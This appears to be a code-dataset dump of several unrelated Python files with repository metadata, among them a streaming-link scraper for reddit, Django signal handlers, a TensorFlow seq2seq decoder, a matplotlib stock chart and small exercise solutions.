the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re,urllib,urlparse
from resources.lib.modules import cleantitle,client,proxy
class source:
    """Scraper that searches a reddit multireddit for streaming links.

    Fixes over the original:
      * bare ``except:`` clauses (which also swallow SystemExit /
        KeyboardInterrupt) narrowed to ``except Exception``;
      * the inner exception handler in ``sources`` returned ``None``,
        discarding any sources already collected — it now returns the
        partial list;
      * the three case-sensitive 'google'/'Google'/'GOOGLE' checks are
        replaced by one case-insensitive test.
    """

    def __init__(self):
        # Metadata consumed by the scraper framework.
        self.priority = 1
        self.language = ['en']
        self.domains = ['reddit.com']
        self.base_link = 'https://www.reddit.com/user/nbatman/m/streaming2/search?q=%s&restrict_sr=on'

    def movie(self, imdb, title, localtitle, aliases, year):
        """Return the subreddit search URL for a movie title/year, or None."""
        try:
            title = cleantitle.geturl(title)
            title = title.replace('-', '+')
            query = '%s+%s' % (title, year)
            url = self.base_link % query
            return url
        except Exception:
            return

    def sources(self, url, hostDict, hostprDict):
        """Scrape the search-results page and return a list of source dicts."""
        sources = []
        try:
            r = client.request(url)
            match = re.compile('class="search-title may-blank" >(.+?)</a>.+?<span class="search-result-icon search-result-icon-external"></span><a href="(.+?)://(.+?)/(.+?)" class="search-link may-blank" >').findall(r)
            for info, http, host, ext in match:
                # Map the resolution advertised in the title to a quality tag.
                if '2160' in info:
                    quality = '4K'
                elif '1080' in info:
                    quality = '1080p'
                elif '720' in info:
                    quality = 'HD'
                else:
                    quality = 'SD'
                url = '%s://%s/%s' % (http, host, ext)
                # Case-insensitive replacement for the literal
                # 'google'/'Google'/'GOOGLE' checks in the original.
                if 'google' in host.lower():
                    host = 'GDrive'
                sources.append({
                    'source': host,
                    'quality': quality,
                    'language': 'en',
                    'url': url,
                    'info': info,
                    'direct': False,
                    'debridonly': False
                })
        except Exception:
            # Best effort: return whatever was gathered before the failure.
            pass
        return sources

    def resolve(self, url):
        # Links are already direct; nothing to resolve.
        return url
| [
"github+github@github.github"
] | github+github@github.github |
56b08623e6f1caaa20f3bd30c23264c4a592c151 | 5085dfd5517c891a1f5f8d99bf698cd4bf3bf419 | /087.py | 05cfccf10e07977157fcd34d680304b9ba743426 | [] | no_license | Lightwing-Ng/100ExamplesForPythonStarter | 01ffd4401fd88a0b997656c8c5f695c49f226557 | 56c493d38a2f1a1c8614350639d1929c474de4af | refs/heads/master | 2020-03-10T22:07:37.340512 | 2018-04-15T13:16:30 | 2018-04-15T13:16:30 | 129,611,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 401 | py | #!/usr/bin/env python
# _*_ coding:utf-8 _*_
"""
* @author: Lightwing Ng
* email: rodney_ng@iCloud.com
* created on Apr 15, 2018, 7:37 PM
* Software: PyCharm
* Project Name: Tutorial
题目:回答结果(结构体变量传递)。
程序分析:无。
"""
class student:
    # Class-level defaults, shared by all instances until shadowed.
    x, c = 0, 0


def f(stu):
    """Mutate the passed object in place (struct-style pass-by-reference demo)."""
    stu.x, stu.c = 20, 'c'


a = student()
a.x, a.c = 3, 'a'
f(a)
print(a.x, a.c)
| [
"rodney_ng@icloud.com"
] | rodney_ng@icloud.com |
84edb83be95037a7358797df88f5c9ca2978d486 | 53312f6eea68e95990923f9159e721f1c018b630 | /app/services/company_services.py | 6e5e4e381b04cd4c20520d51516a4a6b66c59af5 | [] | no_license | BrunoGehlen/stocks_app | 22978ba22c48af73263ce4bd18a2f985609eefe7 | c496bafb8475f6557de29043fb98b366f1b01371 | refs/heads/master | 2023-04-14T20:46:45.786460 | 2021-05-03T20:35:42 | 2021-05-03T20:35:42 | 363,943,042 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,179 | py | from . import datetime, timedelta, HTTPStatus
from app.serializers.company_schema import CompanySchema
from app.models.company_model import CompanyModel
class CompanyServices:
    """Read-side service for companies, trimming stale transactions.

    Changes over the original: the large block of commented-out dead code
    in ``get`` has been removed, and documentation added. Logic is
    unchanged.
    """

    def __init__(self, session):
        self.session = session
        # Midnight of the current day; reference point for transaction age.
        self.todays_datetime = datetime(
            datetime.today().year, datetime.today().month, datetime.today().day
        )

    def get(self, request):
        """Return all companies, each with only its recent transactions.

        ``request`` is accepted for interface parity but is not used.
        The trimming mutates the loaded model objects, so it runs inside
        ``no_autoflush`` to stop SQLAlchemy from persisting the change.

        NOTE(review): ages are measured from *midnight*, not "now", so
        ``< timedelta(hours=1)`` keeps every transaction dated after 23:00
        of the previous day (the subtraction is negative for today's
        transactions) — confirm this window is intentional.
        """
        companies = CompanyModel.query.all()
        with self.session.no_autoflush:
            for company in companies:
                company.transactions = [
                    transaction
                    for transaction in company.transactions
                    if (self.todays_datetime - transaction.transaction_date)
                    < timedelta(hours=1)
                ]
        return {"companies": CompanySchema(many=True).dump(companies)}, HTTPStatus.OK
| [
"you@example.com"
] | you@example.com |
15a91ca627f134ace4c89c131bedcf65cb1b99c4 | 00a086a141acc551c9e3aa23356013cdc8d61b61 | /LeetCode/python/lc021.py | 088a2b04cf2168f0f69ff793b21152f69dd47441 | [] | no_license | ZwEin27/Coding-Training | f01cebbb041efda78bca4bf64e056133d7b7fad7 | 409109478f144791576ae6ca14e2756f8f2f5cb0 | refs/heads/master | 2021-01-18T12:25:06.081821 | 2016-09-04T17:43:44 | 2016-09-05T17:43:44 | 29,571,156 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 884 | py | #!/usr/bin/env python
# Merge two sorted linked lists and return it as a new list. The new list should be made by splicing together the nodes of the first two lists.
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
    # @param {ListNode} l1
    # @param {ListNode} l2
    # @return {ListNode}
    def mergeTwoLists(self, l1, l2):
        """Merge two sorted linked lists and return the merged list's head.

        Fix: the original returned a bare ``[]`` when both inputs were
        empty, which is not a list node and breaks callers that expect a
        node or ``None``; this returns ``None`` instead. Also drops the
        redundant ``result = []`` placeholder and C-style semicolons.

        Ties (equal values) take the node from ``l1`` first, matching the
        original's ``<=`` comparison.
        """
        # If either list is empty, the merge is just the other list
        # (covers the both-empty case by returning None).
        if l1 is None:
            return l2
        if l2 is None:
            return l1
        if l1.val <= l2.val:
            l1.next = self.mergeTwoLists(l1.next, l2)
            return l1
        l2.next = self.mergeTwoLists(l1, l2.next)
        return l2
| [
"zwein27@gmail.com"
] | zwein27@gmail.com |
3980853af39a2d0a86828f26258a712df25ceefd | a47e4026ab8f791518d0319c5f3ec8c5a8afec2e | /Terrain/midlout2h.py | 84d08a8f8039a4bade027f5f33d7513e5de75c2f | [] | no_license | bobbyrward/horrible-terrain-demo | 715064fd020a620751b0c99f0a324300dd4e387e | 55c9add73f5179b4272538950ec8a713dbed88b2 | refs/heads/master | 2016-09-06T08:29:53.623401 | 2009-10-28T19:20:24 | 2009-10-28T19:20:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,840 | py | import re
import sys
# Matches e.g. "STDMETHOD(Name)(THIS_ params) PURE;" -> groups: (name, params).
hresult_re = re.compile(r'STDMETHOD\((.*?)\)\(\s*THIS_?\s*(.*?)\)\s*PURE\s*;\s*')
# Matches "STDMETHOD_(RetType, Name)(THIS_ params) PURE;" -> (rettype, name, params).
rval_re = re.compile(r'STDMETHOD_\((.*?), (.*?)\)\(\s*THIS_?\s*(.*?)\)\s*PURE\s*;\s*')
# this
"""STDMETHOD(EndStateBlock)(THIS_ IDirect3DStateBlock9** ppSB) PURE;
"""
# to this
"""HRESULT EndStateBlock(IDirect3DStateBlock9** ppSB) {
return (*this)->EndStateBlock(ppSB);
}
"""
def output_func_call(outfile, rval, name, params):
    """Emit one inline C++ forwarding method for a COM-style interface method.

    Writes ``rval name(params) { return (*this)->name(args); }`` to
    ``outfile`` using the same tab-indented layout as the original.
    """
    # Each entry is [type, name] after splitting on the last space.
    pieces = [p.strip().rsplit(' ', 1) for p in params.split(',')]
    takes_no_args = len(pieces) == 1 and len(pieces[0]) == 1
    if takes_no_args:
        signature = "\t\t%s %s() {\n" % (rval, name)
        forward = "\t\t\treturn (*this)->%s();\n" % name
    else:
        # The declaration keeps the caller's parameter string verbatim;
        # the forwarding call uses just the names (any '*' stripped).
        signature = "\t\t%s %s(%s) {\n" % (rval, name, params)
        arg_list = ', '.join(piece[1].strip('*') for piece in pieces)
        forward = "\t\t\treturn (*this)->%s(%s);\n" % (name, arg_list)
    outfile.write(signature)
    outfile.write(forward)
    outfile.write("\t\t}\n\n")
# Translate each midl STDMETHOD declaration in device_in.txt into an inline
# C++ wrapper method, written to device_method_calls.h.
with open('device_in.txt') as fd:
    with open('device_method_calls.h', 'w') as outfile:
        # Banner marking the output file as machine-generated.
        outfile.write('/*************************************************/\n')
        outfile.write('/* This file is autogenerated by midlout2h. */\n')
        outfile.write('/* DO NOT EDIT */\n')
        outfile.write('/*************************************************/\n')
        outfile.write('\n')
        for line in fd:
            print line  # progress/debug echo of the current input line (Python 2)
            if hresult_re.match(line):
                # STDMETHOD(...) declarations implicitly return HRESULT.
                output_func_call(outfile, 'HRESULT', *hresult_re.match(line).groups())
            elif rval_re.match(line):
                # STDMETHOD_(RetType, ...) carries an explicit return type.
                output_func_call(outfile, *rval_re.match(line).groups())
            else:
                # Non-blank lines that match neither pattern are fatal.
                if(line.strip()):
                    raise RuntimeError('Unmatchable line "%s"' % line)
| [
"bobbyrward@gmail.com"
] | bobbyrward@gmail.com |
64466beaf3a967d6e4a630cb489949ec77b7de52 | 17a655d21d7ddaf8cf60e23055e107cb602bd9bc | /project/bookmarker/signals.py | f25b97e867ff7e735283ada57d8066db7ebe124d | [] | no_license | geofferyj/YouTubeVideoBookmarker | fedb6913a8c5118c0a51f011244233630cf6f58c | fbf10230c5184cd1479dddafbcfd3609d5ac98f1 | refs/heads/master | 2023-08-04T22:30:37.636957 | 2021-03-01T08:09:46 | 2021-03-01T08:09:46 | 278,203,783 | 0 | 0 | null | 2021-09-22T19:46:09 | 2020-07-08T22:05:00 | JavaScript | UTF-8 | Python | false | false | 1,646 | py | from django.db.models.signals import post_save
from django.contrib.auth.models import User
from django.dispatch import receiver
from bookmarker.models import Token, Video, ResetableViews, Subscription, VoicePause, VoicePlay
# post_save signal pairs: for each related model, create the row alongside
# its owner on first save, then re-save it on every subsequent owner save.

# VoicePause
@receiver(post_save, sender=User)
def create_voicepause(sender, instance, created, **kwargs):
    # `created` is True only on the initial INSERT of this User.
    if created:
        VoicePause.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_voicepause(sender, instance, **kwargs):
    instance.voice_pause.save()
# VoicePlay
@receiver(post_save, sender=User)
def create_voiceplay(sender, instance, created, **kwargs):
    if created:
        VoicePlay.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_voiceplay(sender, instance, **kwargs):
    instance.voice_play.save()
# Token
@receiver(post_save, sender=User)
def create_token(sender, instance, created, **kwargs):
    if created:
        Token.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_token(sender, instance, **kwargs):
    instance.tokens.save()
# Subscription
@receiver(post_save, sender=User)
def create_subscription(sender, instance, created, **kwargs):
    if created:
        Subscription.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_subscription(sender, instance, **kwargs):
    instance.subscription.save()
# ResetableViews — attached to Video saves, not User saves.
@receiver(post_save, sender=Video)
def create_rviews(sender, instance, created, **kwargs):
    if created:
        ResetableViews.objects.create(video=instance)
@receiver(post_save, sender=Video)
def save_rviews(sender, instance, **kwargs):
    instance.rviews.save()
| [
"geofferyjoseph1@gmail.com"
] | geofferyjoseph1@gmail.com |
0efe422b2d4a7ed61c38d320817a656491c43136 | 4809471274d6e136ac66d1998de5acb185d1164e | /pypureclient/flasharray/FA_2_5/models/alert_event_get_response.py | 277b06b6969aff3effbb0edb3555fb2a5e1c3824 | [
"BSD-2-Clause"
] | permissive | astrojuanlu/py-pure-client | 053fef697ad03b37ba7ae21a0bbb466abf978827 | 6fa605079950765c316eb21c3924e8329d5e3e8a | refs/heads/master | 2023-06-05T20:23:36.946023 | 2021-06-28T23:44:24 | 2021-06-28T23:44:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,805 | py | # coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_5 import models
class AlertEventGetResponse(object):
    """Swagger-codegen model for the alert-event GET response.

    Attributes:
      swagger_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # Attribute name -> declared swagger type (drives to_dict serialization).
    swagger_types = {
        'more_items_remaining': 'bool',
        'total_item_count': 'int',
        'continuation_token': 'str',
        'items': 'list[AlertEvent]'
    }
    # Attribute name -> JSON key; identical here, kept for generator generality.
    attribute_map = {
        'more_items_remaining': 'more_items_remaining',
        'total_item_count': 'total_item_count',
        'continuation_token': 'continuation_token',
        'items': 'items'
    }
    # No constructor arguments are mandatory for this model.
    required_args = {
    }
    def __init__(
        self,
        more_items_remaining=None,  # type: bool
        total_item_count=None,  # type: int
        continuation_token=None,  # type: str
        items=None,  # type: List[models.AlertEvent]
    ):
        """
        Keyword args:
            more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
            total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
            continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
            items (list[AlertEvent])
        """
        # Only set attributes explicitly provided, so unset ones read as missing
        # (see __getattribute__).
        if more_items_remaining is not None:
            self.more_items_remaining = more_items_remaining
        if total_item_count is not None:
            self.total_item_count = total_item_count
        if continuation_token is not None:
            self.continuation_token = continuation_token
        if items is not None:
            self.items = items
    def __setattr__(self, key, value):
        # Reject attribute names outside the declared model so typos fail fast.
        if key not in self.attribute_map:
            raise KeyError("Invalid key `{}` for `AlertEventGetResponse`".format(key))
        self.__dict__[key] = value
    def __getattribute__(self, item):
        value = object.__getattribute__(self, item)
        # Class-level Property placeholders mean "unset": surface them as a
        # missing attribute rather than returning the placeholder object.
        if isinstance(value, Property):
            raise AttributeError
        else:
            return value
    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}
        for attr, _ in six.iteritems(self.swagger_types):
            if hasattr(self, attr):
                value = getattr(self, attr)
                # Recursively serialize nested models, lists, and dicts.
                if isinstance(value, list):
                    result[attr] = list(map(
                        lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                        value
                    ))
                elif hasattr(value, "to_dict"):
                    result[attr] = value.to_dict()
                elif isinstance(value, dict):
                    result[attr] = dict(map(
                        lambda item: (item[0], item[1].to_dict())
                        if hasattr(item[1], "to_dict") else item,
                        value.items()
                    ))
                else:
                    result[attr] = value
        if issubclass(AlertEventGetResponse, dict):
            for key, value in self.items():
                result[key] = value
        return result
    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())
    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()
    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, AlertEventGetResponse):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hubert.chan@purestorage.com"
] | hubert.chan@purestorage.com |
fef2f7c9212ccab6017d6dd21a22597a88f51592 | fa6612470d814f365280b0480b14748f27c1333c | /Data Visualization with Matplotlib/23_sharexAxis.py | 5e67e5f9cf5ee0bce913dac588aef4e1792b6f97 | [] | no_license | SaretMagnoslove/Practical_Machine_Learning_with_python | ffca9da49774d6bf4c459960a691b8dc351f8f1f | 2e426cecb99831bba75ff2faad1d61f1b802dacb | refs/heads/master | 2020-03-23T02:16:24.274694 | 2018-09-25T23:19:51 | 2018-09-25T23:19:51 | 140,965,770 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,683 | py | import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import matplotlib.ticker as mticker
from matplotlib.dates import bytespdate2num
from matplotlib.finance import candlestick_ohlc
from matplotlib import style
import numpy as np
import urllib
# style.use('ggplot')
style.use('fivethirtyeight')
MA1 = 10
MA2 = 30
def moving_average(values, window):
    """Simple moving average of ``values`` over a ``window``-sample span.

    Returns an array shorter than the input by ``window - 1`` samples
    (only positions where the window fully overlaps the data).
    """
    kernel = np.ones(window) / float(window)
    return np.convolve(values, kernel, mode='valid')
def highes_minus_lows(highs, lows):
return highs - lows
def graph_data(stock):
fig = plt.figure()
ax1 = plt.subplot2grid((6, 1), (0, 0), rowspan=1, colspan=1)
plt.title(stock)
plt.ylabel('H-l')
ax2 = plt.subplot2grid((6, 1), (1, 0), rowspan=4, colspan=1, sharex=ax1)
plt.ylabel('Price')
ax3 = plt.subplot2grid((6, 1), (5, 0), rowspan=1, colspan=1, sharex=ax1)
plt.ylabel('MovingAvg')
# Unfortunately, Yahoo's API is no longer available
# feel free to adapt the code to another source, or use this drop-in replacement.
stock_price_url = 'https://pythonprogramming.net/yahoo_finance_replacement'
source_code = urllib.request.urlopen(stock_price_url).read().decode()
stock_data = []
split_source = source_code.split('\n')
for line in split_source[1:]:
split_line = line.split(',')
if len(split_line) == 7:
if 'values' not in line and 'labels' not in line:
stock_data.append(line)
date, closep, highp, lowp, openp, adj_closep, volume = np.loadtxt(
stock_data,
delimiter=',',
unpack=True,
converters={0: bytespdate2num('%Y-%m-%d')})
x, y, ohlc = 0, len(date), []
while x < y:
append_me = date[x], openp[x], highp[x], lowp[x], closep[x], volume[x]
ohlc.append(append_me)
x += 1
ma1 = moving_average(closep, MA1)
ma2 = moving_average(closep, MA2)
start = len(date[MA2 - 1:])
h_l = [highes_minus_lows(h, l) for h, l in zip(highp, lowp)]
# h_l = list(map(highes_minus_lows, highp, lowp))
ax1.plot_date(date[-start:], h_l[-start:], '-')
ax1.yaxis.set_major_locator(mticker.MaxNLocator(nbins=4, prune='lower'))
candlestick_ohlc(ax2, ohlc[-start:], width=0.4, colorup='g', colordown='r')
for label in ax2.xaxis.get_ticklabels():
label.set_rotation(45)
ax2.yaxis.set_major_locator(mticker.MaxNLocator(nbins=7, prune='upper'))
ax2.grid(True)
bbox_props = dict(boxstyle='larrow', fc='w', ec='k', lw=1)
ax2.annotate(
str(closep[-1]), (date[0], closep[-1]),
xytext=(date[0] + 400, closep[-1]),
bbox=bbox_props)
ax3.plot(date[-start:], ma1[-start:], linewidth=1)
ax3.plot(date[-start:], ma2[-start:], linewidth=1)
ax3.fill_between(
date[-start:],
ma2[-start:],
ma1[-start:],
where=(ma1[-start:] < ma2[-start:]),
facecolor='r',
edgecolor='r',
alpha=0.5)
ax3.fill_between(
date[-start:],
ma2[-start:],
ma1[-start:],
where=(ma1[-start:] > ma2[-start:]),
facecolor='g',
edgecolor='g',
alpha=0.5)
ax3.xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
ax3.xaxis.set_major_locator(mticker.MaxNLocator(10))
ax3.yaxis.set_major_locator(mticker.MaxNLocator(nbins=4, prune='upper'))
for label in ax3.xaxis.get_ticklabels():
label.set_rotation(45)
plt.setp(ax1.get_xticklabels(), visible=False)
plt.setp(ax2.get_xticklabels(), visible=False)
plt.subplots_adjust(
left=0.11, bottom=0.24, right=0.90, top=0.90, wspace=0.2, hspace=0)
plt.show()
# Entry point: fetches data over HTTP and opens a blocking chart window.
graph_data('EBAY')
| [
"magnoslove@gmail.com"
] | magnoslove@gmail.com |
8427a365418b51b3933a3c9fc1d994443f00f617 | a3eb732ead7e1d10a85a88e42dc639eb16a40265 | /instagram_api/response/archived_stories_feed.py | e0ea4adece55f9e2c80964fe8585b77857ed3be3 | [
"MIT"
] | permissive | carsam2021/instagram_api | 7654c0f485c22935cf478016e46e65acbeda9344 | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | refs/heads/master | 2023-03-16T14:06:27.515432 | 2020-10-17T04:39:19 | 2020-10-17T04:39:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 449 | py | from .mapper import ApiResponse, ApiResponseInterface
from .mapper.types import Timestamp, AnyType
from .model import ArchivedStoriesFeedItem
__all__ = ['ArchivedStoriesFeedResponse']
class ArchivedStoriesFeedResponseInterface(ApiResponseInterface):
    # Declarative field spec consumed by the ApiResponse mapper; the
    # list-literal annotation ([ArchivedStoriesFeedItem]) is the mapper's
    # convention for "list of this model", not standard typing syntax.
    items: [ArchivedStoriesFeedItem]
    num_results: int
    more_available: bool
    max_id: int
pass
| [
"root@proscript.ru"
] | root@proscript.ru |
d5639c623837332fced341fd3abdf47957f070cd | b24ce5acced59ef367a20706949953f3ea81d57a | /tensorflow/contrib/seq2seq/python/ops/basic_decoder.py | d19e2b0d5e469b484a16e9290a1cb09684c16638 | [
"Apache-2.0"
] | permissive | BoldizsarZopcsak/Image-Classifier | b57dd3b72cf368cc1d66a5e318003a2a2d8338a4 | c0d471a55a70b3118178488db3c005a9277baade | refs/heads/master | 2022-11-19T12:28:49.625532 | 2018-01-20T15:48:48 | 2018-01-20T15:48:48 | 118,253,026 | 1 | 1 | Apache-2.0 | 2022-11-01T09:24:24 | 2018-01-20T15:04:57 | Python | UTF-8 | Python | false | false | 5,584 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class of Decoders that may sample to generate the next input.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from tensorflow.contrib.rnn import core_rnn_cell
from tensorflow.contrib.seq2seq.python.ops import decoder
from tensorflow.contrib.seq2seq.python.ops import helper as helper_py
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.layers import base as layers_base
from tensorflow.python.util import nest
__all__ = [
"BasicDecoderOutput",
"BasicDecoder",
]
class BasicDecoderOutput(
    collections.namedtuple("BasicDecoderOutput", ("rnn_output", "sample_id"))):
  """Per-step decoder output: the (optionally projected) RNN cell output
  and the id the helper sampled from it."""
  pass
class BasicDecoder(decoder.Decoder):
  """Basic sampling decoder.

  Runs `cell` one step at a time, optionally projects the cell output
  through `output_layer`, and delegates sampling and next-input selection
  to the provided `helper`.
  """

  def __init__(self, cell, helper, initial_state, output_layer=None):
    """Initialize BasicDecoder.

    Args:
      cell: An `RNNCell` instance.
      helper: A `Helper` instance.
      initial_state: A (possibly nested tuple of...) tensors and TensorArrays.
      output_layer: (Optional) An instance of `tf.layers.Layer`, i.e.,
        `tf.layers.Dense`. Optional layer to apply to the RNN output prior
        to storing the result or sampling.

    Raises:
      TypeError: if `cell` is not an instance of `RNNCell`, `helper`
        is not an instance of `Helper`, or `output_layer` is not an instance
        of `tf.layers.Layer`.
    """
    if not isinstance(cell, core_rnn_cell.RNNCell):
      raise TypeError("cell must be an RNNCell, received: %s" % type(cell))
    if not isinstance(helper, helper_py.Helper):
      raise TypeError("helper must be a Helper, received: %s" % type(helper))
    if (output_layer is not None
        and not isinstance(output_layer, layers_base._Layer)):  # pylint: disable=protected-access
      raise TypeError(
          "output_layer must be a Layer, received: %s" % type(output_layer))
    self._cell = cell
    self._helper = helper
    self._initial_state = initial_state
    self._output_layer = output_layer

  @property
  def batch_size(self):
    # The helper owns the inputs and therefore the batch dimension.
    return self._helper.batch_size

  def _rnn_output_size(self):
    """Output size of the cell after the (optional) output layer."""
    size = self._cell.output_size
    if self._output_layer is None:
      return size
    else:
      # To use layer's compute_output_shape, we need to convert the
      # RNNCell's output_size entries into shapes with an unknown
      # batch size. We then pass this through the layer's
      # compute_output_shape and read off all but the first (batch)
      # dimensions to get the output size of the rnn with the layer
      # applied to the top.
      output_shape_with_unknown_batch = nest.map_structure(
          lambda s: tensor_shape.TensorShape([None]).concatenate(s),
          size)
      layer_output_shape = self._output_layer._compute_output_shape(  # pylint: disable=protected-access
          output_shape_with_unknown_batch)
      return nest.map_structure(lambda s: s[1:], layer_output_shape)

  @property
  def output_size(self):
    # Return the cell output and the id
    return BasicDecoderOutput(
        rnn_output=self._rnn_output_size(),
        sample_id=tensor_shape.TensorShape([]))

  @property
  def output_dtype(self):
    # Assume the dtype of the cell is the output_size structure
    # containing the input_state's first component's dtype.
    # Return that structure and int32 (the id)
    dtype = nest.flatten(self._initial_state)[0].dtype
    return BasicDecoderOutput(
        nest.map_structure(lambda _: dtype, self._rnn_output_size()),
        dtypes.int32)

  def initialize(self, name=None):
    """Initialize the decoder.

    Args:
      name: Name scope for any created operations.

    Returns:
      `(finished, first_inputs, initial_state)`.
    """
    return self._helper.initialize() + (self._initial_state,)

  def step(self, time, inputs, state, name=None):
    """Perform a decoding step.

    Args:
      time: scalar `int32` tensor.
      inputs: A (structure of) input tensors.
      state: A (structure of) state tensors and TensorArrays.
      name: Name scope for any created operations.

    Returns:
      `(outputs, next_state, next_inputs, finished)`.
    """
    with ops.name_scope(name, "BasicDecoderStep", (time, inputs, state)):
      cell_outputs, cell_state = self._cell(inputs, state)
      if self._output_layer is not None:
        cell_outputs = self._output_layer(cell_outputs)
      # The helper decides both what id to emit and what to feed next.
      sample_ids = self._helper.sample(
          time=time, outputs=cell_outputs, state=cell_state)
      (finished, next_inputs, next_state) = self._helper.next_inputs(
          time=time,
          outputs=cell_outputs,
          state=cell_state,
          sample_ids=sample_ids)
      outputs = BasicDecoderOutput(cell_outputs, sample_ids)
      return (outputs, next_state, next_inputs, finished)
| [
"zboldi@gmail.com"
] | zboldi@gmail.com |
c69bb2f790f1d53f574bc2e900a0ceffb5445294 | f7ee578df2ef14dca614ea2238520405a7bc1010 | /emission/tests/storageTests/TestMoveFilterField.py | c371fc9aefc1b17ab39a5500b2cbb2002ccf0933 | [
"BSD-3-Clause"
] | permissive | jeffdh5/e-mission-server | 5a02583d7a06b902fa4c1af7858df58c0bd65145 | c4e3ebdb77133a58b5e2796c8850b479ffa8a096 | refs/heads/master | 2020-12-11T07:38:18.620865 | 2015-12-31T01:05:37 | 2015-12-31T01:05:37 | 30,099,294 | 0 | 0 | null | 2015-01-31T02:14:15 | 2015-01-31T02:14:15 | null | UTF-8 | Python | false | false | 3,565 | py | # Standard imports
import unittest
import datetime as pydt
import logging
import json
# Our imports
import emission.core.get_database as edb
import emission.storage.timeseries.format_hacks.move_filter_field as estfm
# Test imports
import emission.tests.common as etc
class TestTimeSeries(unittest.TestCase):
    """Verify that estfm.move_all_filters_to_data moves the 'filter' field
    from entry metadata into entry data for location-style entries, and
    simply drops it for other entry types.

    Changes over the original: the deprecated ``assertEquals`` alias is
    replaced with ``assertEqual``, and the repeated count query is
    extracted into a helper.
    """

    def setUp(self):
        # Load a known iPhone dataset; populates self.testUUID.
        etc.setupRealExample(self, "emission/tests/data/real_examples/iphone_2015-11-06")

    def tearDown(self):
        edb.get_timeseries_db().remove({"user_id": self.testUUID})

    def _filter_count(self, section, key):
        """Entries for this user with <section>.filter == 'distance' and the
        given metadata.key (section is 'metadata' or 'data')."""
        return edb.get_timeseries_db().find({
            'user_id': self.testUUID,
            '%s.filter' % section: 'distance',
            'metadata.key': key}).count()

    def testMoveFilters(self):
        # Seed background/filtered_location entries by cloning the raw
        # background/location entries under the new key.
        for entry in edb.get_timeseries_db().find({'user_id': self.testUUID,
                                                   'metadata.filter': 'distance',
                                                   'metadata.key': 'background/location'}):
            del entry["_id"]
            entry["metadata"]["key"] = "background/filtered_location"
            edb.get_timeseries_db().insert(entry)

        # Before the migration, the filter lives in metadata for all types.
        self.assertEqual(self._filter_count('metadata', 'background/location'), 474)
        self.assertEqual(self._filter_count('metadata', 'background/filtered_location'), 474)
        self.assertEqual(self._filter_count('metadata', 'background/motion_activity'), 594)
        self.assertEqual(self._filter_count('metadata', 'statemachine/transition'), 20)

        estfm.move_all_filters_to_data()

        # After the migration, no entry keeps a metadata-level filter...
        for key in ('background/location', 'background/filtered_location',
                    'background/motion_activity', 'statemachine/transition'):
            self.assertEqual(self._filter_count('metadata', key), 0)

        # ... location entries carry it in data ...
        self.assertEqual(self._filter_count('data', 'background/location'), 474)
        self.assertEqual(self._filter_count('data', 'background/filtered_location'), 474)

        # ... and non-location entries lose it entirely.
        self.assertEqual(self._filter_count('data', 'background/motion_activity'), 0)
        self.assertEqual(self._filter_count('data', 'statemachine/transition'), 0)
if __name__ == '__main__':
    # Run the tests directly: enable debug logging, then delegate to unittest.
    logging.basicConfig(level=logging.DEBUG)
    unittest.main()
| [
"shankari@eecs.berkeley.edu"
] | shankari@eecs.berkeley.edu |
